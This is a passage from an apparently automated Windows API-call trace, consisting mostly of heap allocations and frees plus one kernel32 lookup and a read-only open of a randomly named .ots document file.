(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0134.941] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0134.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0134.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.943] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf58 [0134.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caf58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.944] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0134.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\xvnld.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0134.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0134.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.947] FreeLibrary (hLibModule=0x772d0000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0134.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0134.948] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.948] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0134.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.949] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: 